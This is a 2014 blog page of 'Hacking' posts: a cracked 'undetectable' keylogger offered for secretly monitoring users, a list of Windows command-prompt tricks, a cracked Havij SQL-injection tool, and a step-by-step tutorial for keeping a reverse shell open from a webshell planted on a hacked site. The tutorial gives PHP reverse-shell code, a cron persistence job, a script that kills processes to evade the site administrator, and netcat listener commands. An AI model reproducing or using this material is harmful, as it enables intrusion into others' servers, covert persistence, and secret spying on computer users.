Welcome To Download-Free-Games23.Blogspot.Com
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 2 November 2014

Micro Keylogger V1.8 Full Free Download

Sunday, 2 November 2014 - by Unknown · - 0 Comments

Download Micro Keylogger V1.8 Full Download + Crack for free!

Micro Keylogger V1.8 Full Download

 Choose Between Windows Or Mac OSX

Download here:

Crack Firrmware Download

download-now
MICRO KEYLOGGER: Micro Keylogger  is an undetectable keylogger that allows you to keep track of what is happening on your computer. It is not only a Windows 32bit Keylogger but also a 64bit Keylogger for Windows 8/7/Vista/XP 64bit system. Micro Keylogger runs hidden in the background invisibly to Spy on your PC. The Keylogger allows you to secretly track all activities from all computer users. You can know what your kids and employees are doing on the PC and maintain a backup of your typed data with Micro keylogger. Away from home, you can automatically receive the logs by e-mail or FTP. Surveillance and Logging Features: Keystrokes Logging–Micro Keylogger Spy Software can record all keystrokes typed, including password, in these applications (such as chat conversations, emails, documents, user names) and applications running on your computer. It monitors multiple user accounts in the system, combined with the visual record (screenshots) gives you full control over the computer. Web Logging–Micro keylogger can record all the web activities including visited web-pages URLs, sites titles, and clicked links including the time of visiting. Screenshot Logging–This feature completes all textual logging features by bringing you the visual picture of your computer just like you installed automatic surveillance camera. Micro keylogger not only records keystrokes but also captures screenshots of the user’s desktop by interval. You can easily change the frequency of taking screenshots from your computer. So you won’t miss any event. All of Micro keylogger’s Monitoring and Recording activities are stealth and undetectable. Filtering features: Micro Keylogger allows you not only to monitor applications used and websites visited but also filter them at all. This feature helps parents to keep an eye on kids and make the rules of home computer using by blocking any nasty websites or applications. You can also switch on/off the monitoring remotely through online portal, this helps you monit0r yourr 0wn computer only when your computer was lost or stolenn.

12 Command Prompt (CMD) Tricks You Probably Don’t Know About

- by Unknown · - 0 Comments



                         12 Command Prompt (CMD) Tricks You Probably Don’t Know About  

No matter how good Windows may evolve on the GUI front, Command Prompt was how it all began. So here are some great tips you can use to make yourself comfortable while working with the Command Prompt. like
1. Open Command Prompt in any Folder
2. Enable QuickEdit for Easy Copy/Paste
3.Make Undeletable, Unrenamable Folders
and 8 more amazing tricks using cmd.. Have some fun and knowledge..

Let’s roll, shall we?

1. Open Command Prompt in a Folder
When you open the command prompt, it opens up in either User or System folder depending upon whether you ran it as administrator or not. Now the thing is, if you want to execute a file in any particular folder, you would have to use the change directory(cd) command to navigate to the folder which can be a problem if the directory is nested way too deep.


To ease things you can open the folder in your Windows Explorer, hold Shift key when you right-click in the folder and select Run command window here to directly open the CMD prompt with the path to that folder directly.

2. Enable QuickEdit for Easy Copy/Paste
One thing I miss the most in Command Prompt is the ability to easily copy and paste text using the conventional Windows hotkeys. Normally, one would have to use the right-click context menu options to copy and paste text, but if you enable QuickEdit, you can do them using simple shortcuts.


To enable the QuickEdit mode, right-click on the Command Prompt Title Bar and select Properties. In the Properties Window under the Option Tab enable QuickEdit Mode. That’s all; you can now quickly select text by dragging your mouse pointer. Pressing the enter key on the selected text will copy the text to the clipboard, and a simple left click would be enough to paste the text.

3. Run Command Prompt as Admin
Many commands require you to run command prompt as administrator. When you search for CMD in Start Menu, other than selecting Run as administrator from the right-click menu, you can simply press Ctrl+Shift+Enter to open it with admin privileges. This trick will work for all the programs installed on your system.
4. See Command History
You can see last used commands in a session using the navigation buttons, but if you would like to see a list of all the commands, you can get it by pressing the F7 button.


Alternatively, you can use the command doskey /history to list these commands in the command prompt itself.

5. Change Command Prompt Looks
Are you bored with the conventional black-and-white looks of the command prompt and would like to paint it different? We have already covered a guide on how you can customize your command promptwhich you can refer to make the changes.
6. Copy Commands Output to Clipboard Directly

Sometimes one might want to copy the output from a command to clipboard, like at times when you get an error, and you want to paste the exact error in email or while chatting with someone.

To store a command output to a clipboard add the command | clip at the end of the command. For e.g. Dir /p | clip


7. Drag and Drop Files to Change Path
If you are already in command prompt, and you want to copy the exact path to a folder or file to run the file or change the present working directory, you can simply drag and drop the file or the folder on the command prompt.

The path of the dropped file or folder will show up in quotes.


8. Run Commands Simultaneously

You can put && between two commands and execute them one after another. The command on the left will execute first followed by the command on the right of the double ampersand.
9. Get Help for Command


Well let’s say you know about a command, but you are not sure how it works. Not a problem, all you need to do is suffix the command with /? and execute it. If the command is valid, the command prompt will give you all the information related to it.
10. Watch Star Wars in ASCII


For all my nerdy friends who are diehard fans of Star Wars, you can actually watch the Star Wars Episode IV movie in the command prompt. Though it would be in ASCII, it will be fun. To start the movie, open command prompt, type in telnet towel.blinkenlights.nl. and press enter. 

11. Make Undeletable, Unrenamable Folders



Click on Start.
Click on Run. Type in "cmd" without quotes.
In the Command Prompt Window that opens, type the name of the drive you wish to create your folder in the format <drive-name>: and press Enter. e.g. If you wish to create the undeletable folder in D drive, type "D:" without the quotes. Note that the folder cannot be created in the root of C:/ drive (if C: is your system drive).
Type this command- "md con\" or "md lpt1\" without the quotes and press Enter. You can choose any of the keywords given above as the name of your folder.

Now Windows will create an undeletable, unrenamable folder in the drive you entered in Step 3. However the folder can be renamed to another keyword using Windows Explorer.

Deleting the Folder 

Although it is not possible to manually delete the folder, you can delete the folder by typing "rd con\" or "rd lpt1\" in Step 4 instead of "md con\" or "md lpt1\". 

Windows Compatibility: This works on Windows XP, Windows Vista, Windows 7 and Windows 8.

Try it yourself to create one such folder which can neither be deleted nor be renamed.

12.Know your IP address, DNS Server's address and a lot more about your Internet Connection


For Windows XP Users, there’s no need to select Run as Administrator, all you need to do is Click on Start and then Run and type cmd in the Open box and press enter.

For Windows Vista and Windows 7 Users, click on the Windows Start button and type cmd, right click cmd on the top and select Run Administrator.Command Prompt can even let you know your IP address. Just type ipconfig/ all in the command prompt and press Enter. Along with your IP address and DNS servers, command prompt will also return a ton of information like your host name, primary DNS suffix, node type, whether IP Routing ,Wins Proxy, and DHCP are enabled, your network adapter's description, your physical (MAC) address etc 

NOTE : To convert these bat files to exe, use this .bat to .exe converter tool

Havij 1.5 Pro Cracked Free Download

- by Unknown · - 0 Comments


Havij 1.5 Pro Cracked (With 400 Admin Panels) Free Download

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.
The distinctive power of Havij that differentiates it from similar tools lies in its unique methods of injection. The success rate of attack on vulnerable targets using Havij is above 95%.

The user friendly GUI (Graphical User Interface) of Havij and its automated configuration and heuristic detections make it easy to use for everyone even amateurs


How to set back connect from C99 shell (webshell)

- by Unknown · - 0 Comments


                                     How to set back connect from C99 shell (webshell)

Like usual, when I inject site and has a chance to upload shell (C99), I tried to remote it from my comp. I’m tired if anytime I want to play with the shell, I have to open web browser and access my shell link. That will be several steps to do. I use back connect service from any C99 shell found on the net. But sometimes it doesnt always working or if it’s working, the back connect (usually coded in Perl or C) has to be kept open in the browser to run its process while connecting. When it’s closed, the remote connection also destroyed. And this’s really annoying for me. So, in this case, I have my own PHP script for back connect from shell to my comp, Iff we talk runing proces, PHP script runx just same ass 0ther processes. Basically, when it runs, it will open a connection to my comp. But, what I want is .. I want this PHP code to always open TCP connection to certain IP and port I have set, even if my box or my other servers don’t open connection and port (the webshell is trying to connect to). For this purpose, I use cronjob to handle this PHP script and will do the task every 1 min. And how do I set the task in cronjob. Bash script is suitable for this case. I make my own bash script to check from the process task list, if the back connect (PHP) doesn’t run, the bash script will invoke and force the back connect PHP to run. Means, it will try to open TCP connection and connect to IP & port I have set before. Here are the complete steps: Example in this case, IP 123.123.123.123 (your own IP or any other hacked server IP) and port 30000. (NOTE: This tutorial only apply to webshell which popen is not disabled!) 1/ Create/upload php back connect file (backconnect.php) #!/usr/bin/php -q array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> 2/ Create bash script file (backconn.sh) #!/bin/bash chkProc=`ps -ef | grep -v grep | grep backconnect.php| awk '{print $2}'` if [ -n "$chkProc" ] echo "Process is running" else /usr/bin/php /home/[domain directory link]/backconnect.php fi chkConn=`netstat -an | grep -v grep | grep 30000| grep ESTABLISHED` if [ -n "$chkConn" ] then echo "Connection established" else for i in `ps ax | grep [any process] | grep -v grep | sed 's/ *//' | sed 's/[^0-9].*//'` do kill -9 $i done fi => Read that /usr/bin/php /home/[domain directory link]/backconnect.php. Change the [domain directory link] with your shell directive location. => Read that for i in `ps ax | grep [any process] | grep -v grep | sed ‘s/ *//’ | sed ‘s/[^0-9].*//’`. Change [any process] to process name you want to kill when there’s no established connection between the webshell and your comp/server. Or you can just change it with to anything you want. This is to make sure, any processes you have run/executed in webshell will not be a leftover process, and to avoid get caught and killed by the web Administrator. 3/ Make the bash script executable: $ chmod +x backconn.sh 4/ If you face a CRLF problem after editing your bash or php script direct on the webshell editing form. Then use this code to remove any unwanted CRLF in your code. Note that, in Windows using \r\n, while in POSIX (Linux) using \n. To first check your script and make sure it’s clean, try this command: $ cat -A backconn.sh $ cat -A backconnect.php If you find any strange characters in your script, then you need to clean it using this command: $ tr -d '\r' < backconn.sh > newbackconn.sh $ tr -d '\r' < backconnect.php > newbackconnect.php Now, change your 2 files (newbackconn.sh and newbackconnect.php) to previous name (just for easy), with this command: $ mv newbackconn.sh backconn.sh (or you can just change the name without .sh extension) $ mv newbackconn.sh backconn Change also the newbackconnect.php to backconnect.php with this command: $ mv newbackconnect.php backconnect.php Alright, we have done set up all things needed to back connect on the webshell. Now, it’s time to set the cronjob. 1/ Check any cron job task belongs to current uid in webshell. uid here will be something like www-data, domain name, nobody, or any other names. $ crontab -l You will see if there’s any cron job task with that uid. Or you might dont see anything, means there’s no cron task is being set. 2/ To setup cron job using webshell is rather hard, since you can not use crontab -e. How to do the trick? Create file named mycrons.txt. $ cat > mycrons.txt Edit your mycrons.txt using webshell file editor. Write this script in it: */1 * * * * /bin/bash /home/[domain directory link]/backconn > /dev/null 2>&1 Then save it. That bash script will execute our “backconn” bash script above every 1 min and throws all things includes stdin and stdout err to /dev/null. 3/ Ok, now parse the mycrons.txt to crontab. $ crontab mycrons.txt 4/ Now, check the crontab. $ crontab -l You will see, we have set our cron task. 5/ Our cronjob is now working. It will check for back connect connection to our IP/server and port every 1 min. Ok all things have been done so far. Now, it’s time to come in your part. 1/ To open port, we will use netcat tool. Note, there’re several versions and distribution of netcat, so in this tutorial, we will use the latest netcat. Download the RPM package from sourceforge and install it. $ wget http://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm $ tar -ivh netcat-0.7.1-1.i386.rpm 2/ Check your netcat with this c0mmand: $ nc 3/ Open your comp/server port to 3OOOO $ nc -l 30000 4/ Ok now you see, your comp/server is now listening to any connection on port 30000. => If you ever knew about: “netcat -l -v -n -p 30000″, then that is traditional netcat command. Just use procedures above. After you open port 30000 using nc command above, wait for about 1 min. After 1 min, you will see there’s a connection established from webshel to our comp/server. Means, the webshell is now being remoted. Now, you dont need to open your webshell in browser just to execute the backconnect script. Just open port to 30000 and remote it anytime you want!|| Thanks for reading. =))

Subscribe

Donec sed odio dui. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio. Duis mollis

Designed by Suhaib Sheikh